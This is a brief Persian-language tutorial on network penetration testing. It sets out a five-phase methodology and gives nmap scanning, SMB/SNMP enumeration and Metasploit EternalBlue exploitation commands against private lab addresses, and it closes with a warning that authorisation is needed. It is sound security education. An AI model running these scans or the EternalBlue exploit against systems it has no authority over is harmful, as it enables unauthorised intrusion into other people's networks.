مقدمهای بر تست نفوذ شبکه
تست نفوذ حملات واقعی را برای یافتن آسیبپذیریها قبل از بازیگران مخرب شبیهسازی میکند. این راهنما متدولوژی و ابزارهای کلیدی را پوشش میدهد.
متدولوژی: ۵ مرحله
۱. شناسایی: جمعآوری اطلاعات بهصورت غیرفعال
۲. اسکن: کشف هاستهای فعال و پورتهای باز
۳. شمارش: استخراج نسخههای سرویس و کاربران
۴. بهرهبرداری: تلاش برای به خطر انداختن سیستمها
۵. گزارش: مستندسازی یافتهها و اقدامات اصلاحی
مرحله ۲: اسکن شبکه با Nmap
BASH
# کشف هاست
nmap -sn 192.168.1.0/24
# اسکن کامل پورت با تشخیص نسخه
nmap -sV -sC -p- --min-rate 1000 192.168.1.10 -oN scan.txt
# اسکن UDP (کندتر اما مهم)
nmap -sU --top-ports 100 192.168.1.10مرحله ۳: شمارش سرویس
BASH
# شمارش SMB
enum4linux -a 192.168.1.10
smbclient -L //192.168.1.10 -N
# شمارش SNMP
snmpwalk -v2c -c public 192.168.1.1مرحله ۴: بهرهبرداری با Metasploit
BASH
msfconsole
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.10
msf6 exploit > runآسیبپذیریهای رایج شبکه
- اعتبارنامههای پیشفرض روی تجهیزات شبکه
- فریمور وصلهنشده (MikroTik، Cisco، Fortigate)
- رشته Community SNMP «public»
- Telnet/FTP باز به جای SSH/SFTP
- شبکههای تخت بدون تقسیمبندی
گزارش
همیشه مستند کنید: محدوده، متدولوژی، یافتهها (با شدت)، اثبات مفهوم، و توصیههای اصلاحی. هرگز بدون مجوز کتبی سیستمهای تولیدی را بهرهبرداری نکنید.
